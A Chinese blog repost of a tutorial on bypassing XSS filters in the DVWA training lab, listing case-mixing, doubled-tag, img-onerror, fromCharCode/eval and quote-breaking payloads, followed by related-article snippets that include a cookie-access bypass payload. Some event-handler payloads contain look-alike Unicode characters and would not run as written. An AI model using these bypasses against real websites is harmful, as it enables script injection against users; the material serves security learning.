XSS 基本绕过

最新推荐文章于 2024-05-03 21:44:52 发布
最新推荐文章于 2024-05-03 21:44:52 发布
阅读量246 收藏 1
点赞数
文章标签: javascript ViewUI
原文链接:http://www.cnblogs.com/pangya/p/8979211.html
版权

 以下实验使用DVWA测试:

 

  1.反射型

      把DVWA等级调至Medium

      

      查看源码:

          

        使用str_replace函数:遇到<script> 都会替换成空格。

         使用str_replace函数时可用双写绕过,大小写绕过

      (1).<Script>alert('xss')</Script>                 大小写绕过

      (2).<scr<script>ipt>alert('xss)</scr</script>ipt>          会过滤<script></script>一次。(双写绕过)

   2.把DVWA等级调至High

       查看源码:

        

          可以看出使用preg_replace函数:使用了正则表达式,把后面/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i  全部转换成空格。

          (1).使用常规的payload时:发现只有个>存在,说明preg_replace函数生效。

              

          (2).还可以尝试大小写,双写绕过发现都没有效果。

          (3).绕过方法

              payload:  <img src=1 οnerrοr=alert('xss')>             

                当做了对script过滤,只要出现就错误时,可使用onerror绕过。

                  例:如果在加载图片时发生错误则执行 JavaScript(onerror) :<img src="image.gif" οnerrοr="myFunction()">

                

              补充:                  

                <!-- 利用基本事件 -->  
                <img src=x οnerrοr=alert(1)> //事件会在文档或图像加载过程中发生错误时被触发
                <img scr=x οnlοad=alert(1)> //图片正常加载才执行onload
                <img scr=x οnclick=alert(1)>//事件会在对象被点击时发生  

                <img scr=x οnmοuseοver=alert(1) > //当鼠标指针移动到图像上时执行一段 JavaScript:

 注:存储型绕过与之一样。

 

3.一个实战:遇到alert就会返回一个 error 。这个利用转码进行绕过:

  alert("xss ")转码

<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34,88,83,83, 34, 41))</script>

String.fromCharCode 就是把ascii码转成字符串,然后eval就是把该字符串解析成javascript语句来执行。

 

4.实战:参数传递绕过。

    
        绕过:  ";alert('xss')//
    



            

                    

                                  关注网络安全
 

转载于:https://www.cnblogs.com/pangya/p/8979211.html

weixin_30748995
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS绕过
N1nG
09-22 5112
绕过XSS-Filter =======================利用 用户可以随心所欲地引入插入恶意脚本代码. =========================利用HTML标签属性值执行XSS========================= 很多HTML标记中的属性都支持javascript:[code]伪协议的形式. //并非所有浏览器都支持,支持的例IE6 可以
XSS注入绕过防护
LJH1999ZN的博客
02-17 1300
一、输入与输出的防护机制 字符实体化 关键字变形 关键字去除 尖括号去除 二、xss防护规则的绕过 1.大小写,双写绕过 为了避免XSS漏洞的存在,通常应用会对用户输入进行一定的安全处理后再输出的HTML中, 防护的方法有: 过滤:发现关键字返回错误 编码:对关键字进行编码 插入:插入改变关键字的符号 删除:删除关键字 绕过防护的思路: 判断关键字 判断防护规则 尝试不同的payload 大小写,双写 关键的符号有:' " ()<>{}=&--; 关键..
【漏洞发现-xss跨站脚本攻击】双写绕过
m0_46344990的博客
06-01 1314
xss跨站脚本攻击是黑客通过“html注入”篡改了网页,插入了js恶意脚本,前端渲染时进行恶意代码执行,从而控制用户浏览的一种攻击。经常出现在需要用户输入的地方,一旦对输入不进行处理,就会发生网页被篡改。分为三类反射型:经过后端,不经过数据库存储型:经过后端,经过数据库DOM型:不经过后端,是基于文档对象型的一种漏洞,dom-xss是通过url参数去控制触发的xss靶场第七关服务器采用了替换恶意关键字的方式防御,可以双写绕过。直接看源码,服务器接受keyword变量的值,将script、on、src、dat
2024年网络安全最新PHP CTF常见考题的绕过技巧_str_replace函数绕过(2)
最新发布
2401_84265972的博客
05-03 1082
/使用1.0就可以绕过if(MD5(GET′name′])==MD5echo $flag;echo ‘?PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。
【网络安全 --- XSS绕过xss绕过手法及思路你了解吗?常见及常用的绕过手法了解一下吧
m0_67844671的博客
10-18 1267
【网络安全 --- XSS绕过xss绕过手法及思路你了解吗?常见及常用的绕过手法了解一下吧;你知道xss如何绕过吗?本篇讲述了一些xss常见的绕过手法及技巧,包括双写,大小写绕过,编码绕过等,过来看看吧
xss绕过
weixin_51692662的博客
08-19 2592
xss绕过
[ 常见漏洞篇 ]常见web漏洞总结------XSS绕过方式
qq_51577576的博客
12-06 3672
本文具体写到了常见的XSS绕过方式,间的的介绍了一下修复方式 写的比较细,比较深,需要一定的基础才能看懂,仔细读完 不懂的可以百度查一查或者私信我,相信会有很大收获 目录 一、Xss绕过方式: 1. 前端过滤 2.双写绕过 3. 事件绕过 4. 大小写绕过 5. 注释干扰绕过 6.伪协议绕过 7.空格回车Tab绕过 8. 编码绕过 1. base64编码: 2. JS编码: 3. 十六进制: 4. unicode: 5. HTML实体编码: 6. URL...
第十六节 unicode绕过过滤触发XSS-01
09-15
Unicode绕过过滤触发XSS-01 Unicode绕过过滤触发XSS是指攻击者通过使用Unicode字符来绕过Web应用程序的输入验证和过滤机制,从而触发跨站脚本(XSS)攻击。下面将详细介绍Unicode绕过过滤触发XSS的原理和实现方法。...
第十二节 利用IE特性绕过XSS过滤-01
09-15
在本节课程中,我们将讨论如何利用 IE 特性绕过 XSS 过滤,并对应不同的 XSS 攻击场景,包括 XSS 漏洞发现、基本 XSS 利用、IE 特性讲解和 Payload 触发 XSSXSS 漏洞发现 XSS 漏洞发现是指在目标网站中查找可能...
第十三节 利用CSS特性绕过XSS过滤-01
09-15
利用CSS特性绕过XSS过滤 在Web安全领域中,XSS(Cross-Site Scripting)是一种常见的攻击方式,它通过在目标网站中插入恶意脚本来攻击用户。为了防止XSS攻击,很多网站都部署了XSS过滤机制。但是,攻击者可以利用...
xss基本原理分析
03-17
XSS的威胁在于它能够绕过同源策略,使得攻击者能够在受害者信任的网站上执行恶意代码。 XSS攻击主要有三种类型:反射型XSS、存储型XSS和DOM型XSS。 1. **反射型XSS** 反射型XSS也称为非持久性XSS,是通过诱使用户...
xss-labs靶场通关
10-13
第六关源码使用str_replace函数将替换为空,但是这个函数并没有将所有的xss payload都过滤掉,我们可以使用其他方法来绕过过滤,触发xss攻击。 xss-labs靶场的六关源码展示了xss攻击的多种形式和方法,每一关都有其...
XSS跨站脚本漏洞(绕过篇)
嚴 帅的博客
05-07 1660
前面我们提到XSS,对于一个基本XSS漏洞页面,它发生的原因往往是从用户输入的数据到输出没有有效的过滤,就比如下面的这个范例代码。 <?php $a = $_GET['a']; echo $a; ?> 对于这样毫无过滤的页面,我们可以使用一些简单的恶意脚本即可完成攻击,但是事实上,为了应付XSS的攻击,我们会采用黑名单技术对一些特殊字符进行过滤,包括一些敏感的函数。但是这样一来...
xss绕过方法有哪些?XSS攻击绕过过滤方法技巧分享(xss绕过宝塔)
白帽子佳奇的博客
12-12 4255
XSS(跨站脚本攻击)绕过方法是一系列技巧,用来绕过目标网站的安全措施和过滤器,执行恶意的脚本。
XSS过滤绕过技巧
Javachichi的博客
03-23 562
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。
14.xss之alert绕过&cookie绕过
HWHXY的博客
12-25 4587
前言 该篇记录为记录实际的src过程第14篇小文章,内容为某网站的xssbypass。 XSS 特征 拦截了常见的alert和prompt,大小写无法绕过,eval无法绕过,alert.call无法绕过 xss绕过 alert用top[‘ale’+‘rt’]绕过 alert()用top[‘ale’+‘rt’].call绕过 cookie用document[变量]绕过 最终payload <img src=\"x\" onerror=\"c='coo'+'kie';top['ale'+'rt'].c
跨站脚本攻击漏洞XSS绕过22种方式总结
黄乔国PHP
01-03 2311
跨站脚本攻击在目前这个时间节点还是属于一个排位比较高的漏洞,在OWASP TOP10 2021中隶属于注入型漏洞,高居TOP3的排位,可见这个漏洞的普遍性。跨站脚本攻击的学习中我们主要需要明白的是跨站的含义,以及XSS的核心。XSS主流分类分为:反射型,存储型,DOM型三类,比较重要的是存储型。
XSS攻击绕过过滤方法大全(转)
热门推荐
mingyqf的博客
04-20 2万+
XSS攻击绕过过滤方法大全(约100种) 虽然说很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,但是,万事总有可能,只要有一定的条件,我们就可以构造经过编码后的语句来进行XSS注入。 这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录,现在此XSS备忘录将由OWASP维护和完善它。 OWASP 的第一个防御备忘录项目:XSS (Cross Site Scripting)Prevention Cheat She
3. XSS事件触发绕过
08-03
XSS事件触发绕过是指绕过XSS防御机制,成功触发XSS攻击。根据引用[1]和引用[2]的内容,可以得出一些绕过XSS防御的方法。其中一种方法是改变请求方式,将POST请求改为GET请求,然后通过访问URL来执行恶意代码。另一种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值